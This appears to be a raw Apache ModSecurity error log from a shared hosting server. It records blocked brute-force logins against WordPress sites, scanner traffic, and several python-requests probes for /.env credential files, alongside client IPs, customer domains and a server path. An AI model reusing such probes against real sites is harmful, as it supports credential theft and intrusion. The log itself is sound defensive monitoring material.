[Tue May 26 18:13:53.689758 2026] [security2:error] [pid 973439:tid 973585] [client 82.76.238.33:54383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWViQBg9mKRpdEFs3B6igAAABA"]
[Tue May 26 18:13:53.689957 2026] [security2:error] [pid 973439:tid 973585] [client 82.76.238.33:54383] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWViQBg9mKRpdEFs3B6igAAABA"]
[Tue May 26 18:13:54.204934 2026] [security2:error] [pid 973439:tid 973659] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWViQBg9mKRpdEFs3B6lAAAAFo"]
[Tue May 26 18:13:57.618043 2026] [security2:error] [pid 973439:tid 973690] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVjQBg9mKRpdEFs3B69gAAAHk"]
[Tue May 26 18:13:59.824043 2026] [security2:error] [pid 973439:tid 973458] [remote 160.250.186.220:38932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVjwBg9mKRpdEFs3B7OAAASBI"]
[Tue May 26 18:13:59.945969 2026] [security2:error] [pid 973439:tid 973589] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVjwBg9mKRpdEFs3B7MQAAABQ"]
[Tue May 26 18:14:00.035439 2026] [security2:error] [pid 973439:tid 973610] [client 66.249.66.43:42951] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "www.greattusker.com"] [uri "/robots.txt"] [unique_id "ahWVkABg9mKRpdEFs3B7RQAAACk"]
[Tue May 26 18:14:00.269764 2026] [security2:error] [pid 973439:tid 973467] [remote 212.224.100.2:24526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWVkABg9mKRpdEFs3B7RgAAIhs"]
[Tue May 26 18:14:00.696524 2026] [security2:error] [pid 973439:tid 973459] [remote 18.190.7.192:56912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWVkABg9mKRpdEFs3B7SQAAORM"]
[Tue May 26 18:14:02.518939 2026] [security2:error] [pid 973439:tid 973462] [remote 212.224.100.2:24526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWVkgBg9mKRpdEFs3B7cQAAbBY"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:14:02.715314 2026] [security2:error] [pid 973439:tid 973470] [remote 103.91.67.202:62490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWVkgBg9mKRpdEFs3B7eAAAdR4"]
[Tue May 26 18:14:03.327225 2026] [security2:error] [pid 973439:tid 973604] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVkgBg9mKRpdEFs3B7dwAAACM"]
[Tue May 26 18:14:03.845045 2026] [security2:error] [pid 973439:tid 973637] [client 82.76.238.33:54852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVkwBg9mKRpdEFs3B7kgAAAEQ"]
[Tue May 26 18:14:03.848774 2026] [security2:error] [pid 973439:tid 973637] [client 82.76.238.33:54852] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVkwBg9mKRpdEFs3B7kgAAAEQ"]
[Tue May 26 18:14:04.837319 2026] [security2:error] [pid 973439:tid 973465] [remote 143.198.203.76:50514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVlABg9mKRpdEFs3B7rQAAfxk"]
[Tue May 26 18:14:04.989988 2026] [security2:error] [pid 973439:tid 973673] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVlABg9mKRpdEFs3B7pAAAAGg"]
[Tue May 26 18:14:07.256666 2026] [security2:error] [pid 973439:tid 973644] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVlgBg9mKRpdEFs3B74wAAAEs"]
[Tue May 26 18:14:09.499807 2026] [security2:error] [pid 973439:tid 973570] [client 222.253.225.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVmABg9mKRpdEFs3B8GwAAAAE"]
[Tue May 26 18:14:10.310875 2026] [security2:error] [pid 973439:tid 973632] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVmQBg9mKRpdEFs3B8NgAAAD8"]
[Tue May 26 18:14:13.211319 2026] [security2:error] [pid 973439:tid 973650] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVnABg9mKRpdEFs3B8hQAAAFE"]
[Tue May 26 18:14:15.089034 2026] [security2:error] [pid 973439:tid 973607] [client 82.76.238.33:55293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVnwBg9mKRpdEFs3B8wwAAACY"]
[Tue May 26 18:14:15.089168 2026] [security2:error] [pid 973439:tid 973607] [client 82.76.238.33:55293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVnwBg9mKRpdEFs3B8wwAAACY"]
[Tue May 26 18:14:16.002865 2026] [security2:error] [pid 973439:tid 973620] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVnwBg9mKRpdEFs3B80gAAADM"]
[Tue May 26 18:14:16.546028 2026] [security2:error] [pid 973439:tid 973507] [remote 50.6.192.190:35496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWVoABg9mKRpdEFs3B85wAACUM"]
[Tue May 26 18:14:16.744131 2026] [security2:error] [pid 973439:tid 973658] [client 104.28.119.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWVoABg9mKRpdEFs3B88AAAAFk"]
[Tue May 26 18:14:17.789521 2026] [security2:error] [pid 973439:tid 973624] [client 45.157.112.187:40913] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "azurmediatec.com"] [uri "/index.php"] [unique_id "ahWVoQBg9mKRpdEFs3B9GwAAADc"]
[Tue May 26 18:14:18.559535 2026] [security2:error] [pid 973439:tid 973593] [client 85.11.167.19:55934] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "worldwidecourier.co.in"] [uri "/.env"] [unique_id "ahWVogBg9mKRpdEFs3B9egAAABg"]
[Tue May 26 18:14:18.768982 2026] [security2:error] [pid 973439:tid 973464] [remote 168.63.79.147:42080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVogBg9mKRpdEFs3B9ewAANhg"]
[Tue May 26 18:14:19.263434 2026] [security2:error] [pid 973439:tid 973487] [remote 168.63.79.147:42080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVowBg9mKRpdEFs3B9jAAACi8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:14:19.292610 2026] [security2:error] [pid 973439:tid 973491] [remote 50.6.192.190:35496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWVowBg9mKRpdEFs3B9jgAADzM"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:14:19.338287 2026] [security2:error] [pid 973439:tid 973644] [client 85.11.167.19:55940] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "worldwidecourier.co.in"] [uri "/"] [unique_id "ahWVowBg9mKRpdEFs3B9kAAAAEs"]
[Tue May 26 18:14:19.922064 2026] [security2:error] [pid 973439:tid 973626] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVoQBg9mKRpdEFs3B9VAAAADk"]
[Tue May 26 18:14:20.179902 2026] [security2:error] [pid 973439:tid 973613] [client 104.28.163.39:12702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.163.28.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cargo-pulse.info"] [uri "/wp-login.php"] [unique_id "ahWVowBg9mKRpdEFs3B9mAAAACw"]
[Tue May 26 18:14:20.380688 2026] [security2:error] [pid 973439:tid 973469] [remote 209.42.20.53:41672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWVpABg9mKRpdEFs3B9oQAAAB0"]
[Tue May 26 18:14:20.430982 2026] [security2:error] [pid 973439:tid 973595] [client 85.11.167.19:55954] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/.env"] [unique_id "ahWVpABg9mKRpdEFs3B9qAAAABo"]
[Tue May 26 18:14:20.693036 2026] [security2:error] [pid 973439:tid 973479] [remote 74.7.241.58:47980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWVpABg9mKRpdEFs3B9rwAAHSc"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/de
[Tue May 26 18:14:21.477107 2026] [security2:error] [pid 973439:tid 973687] [client 85.11.167.19:55956] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/"] [unique_id "ahWVpQBg9mKRpdEFs3B9xQAAAHY"]
[Tue May 26 18:14:21.517610 2026] [security2:error] [pid 973439:tid 973579] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVpQBg9mKRpdEFs3B9wQAAAAo"]
[Tue May 26 18:14:21.629581 2026] [security2:error] [pid 973439:tid 973646] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVpABg9mKRpdEFs3B9rgAAAE0"]
[Tue May 26 18:14:24.086655 2026] [security2:error] [pid 973439:tid 973689] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVpwBg9mKRpdEFs3B97wAAAHg"]
[Tue May 26 18:14:24.481808 2026] [security2:error] [pid 973439:tid 973512] [remote 79.143.178.15:35756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWVqABg9mKRpdEFs3B-DwAAbkg"]
[Tue May 26 18:14:25.993801 2026] [security2:error] [pid 973439:tid 973494] [remote 79.143.178.15:35756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWVqQBg9mKRpdEFs3B-NgAAfzY"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:14:26.230217 2026] [security2:error] [pid 973439:tid 973659] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVqQBg9mKRpdEFs3B-LAAAAFo"]
[Tue May 26 18:14:26.548144 2026] [security2:error] [pid 973439:tid 973676] [client 82.76.238.33:55737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVqgBg9mKRpdEFs3B-QAAAAGs"]
[Tue May 26 18:14:26.548346 2026] [security2:error] [pid 973439:tid 973676] [client 82.76.238.33:55737] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVqgBg9mKRpdEFs3B-QAAAAGs"]
[Tue May 26 18:14:26.835285 2026] [security2:error] [pid 973439:tid 973514] [remote 88.198.165.116:39478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVqgBg9mKRpdEFs3B-RwAAE0o"]
[Tue May 26 18:14:28.653070 2026] [security2:error] [pid 973439:tid 973507] [remote 40.77.167.25:39884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 25.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thegoodsporting.com"] [uri "/rugby-league.php"] [unique_id "ahWVrABg9mKRpdEFs3B-cQAAekM"]
[Tue May 26 18:14:29.434792 2026] [security2:error] [pid 973439:tid 973695] [client 43.173.179.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWVrQBg9mKRpdEFs3B-hwAAAH4"]
[Tue May 26 18:14:29.728212 2026] [security2:error] [pid 973439:tid 973650] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVrABg9mKRpdEFs3B-cAAAAFE"]
[Tue May 26 18:14:31.301023 2026] [security2:error] [pid 973439:tid 973654] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVrgBg9mKRpdEFs3B-nQAAAFU"]
[Tue May 26 18:14:34.319207 2026] [security2:error] [pid 973439:tid 973654] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVsQBg9mKRpdEFs3B-7AAAAFU"]
[Tue May 26 18:14:34.356952 2026] [security2:error] [pid 973439:tid 973529] [remote 216.73.217.110:19792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWVsgBg9mKRpdEFs3B-_wAAeVk"]
[Tue May 26 18:14:36.209483 2026] [core:crit] [pid 973439:tid 973570] (13)Permission denied: [client 157.55.39.200:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:14:36.226874 2026] [security2:error] [pid 973439:tid 973615] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVswBg9mKRpdEFs3B_FQAAAC4"]
[Tue May 26 18:14:37.861069 2026] [security2:error] [pid 973439:tid 973617] [client 82.76.238.33:56181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVtQBg9mKRpdEFs3B_WwAAADA"]
[Tue May 26 18:14:37.862516 2026] [security2:error] [pid 973439:tid 973617] [client 82.76.238.33:56181] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVtQBg9mKRpdEFs3B_WwAAADA"]
[Tue May 26 18:14:38.346580 2026] [core:crit] [pid 973439:tid 973618] (13)Permission denied: [client 52.167.144.220:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:14:39.519652 2026] [security2:error] [pid 973439:tid 973515] [remote 78.142.18.172:39162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVtwBg9mKRpdEFs3B_igAAd0s"]
[Tue May 26 18:14:39.559002 2026] [security2:error] [pid 973439:tid 973664] [client 178.20.210.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWVtgBg9mKRpdEFs3B_gAAAX08"]
[Tue May 26 18:14:39.573077 2026] [security2:error] [pid 973439:tid 973629] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVtgBg9mKRpdEFs3B_dwAAADw"]
[Tue May 26 18:14:39.803085 2026] [security2:error] [pid 973439:tid 973444] [remote 78.142.18.172:39162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVtwBg9mKRpdEFs3B_lAAAWQQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:14:40.923438 2026] [security2:error] [pid 973439:tid 973677] [client 178.20.210.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWVuABg9mKRpdEFs3B_ngAAbHY"]
[Tue May 26 18:14:41.555949 2026] [security2:error] [pid 973439:tid 973627] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVuQBg9mKRpdEFs3B_swAAADo"]
[Tue May 26 18:14:44.493224 2026] [security2:error] [pid 973439:tid 973576] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVuwBg9mKRpdEFs3CADwAAAAc"]
[Tue May 26 18:14:44.655481 2026] [core:crit] [pid 973439:tid 973632] (13)Permission denied: [client 157.55.39.200:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:14:45.869000 2026] [security2:error] [pid 973439:tid 973442] [remote 222.165.190.235:48646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVvQBg9mKRpdEFs3CASQAAJgI"]
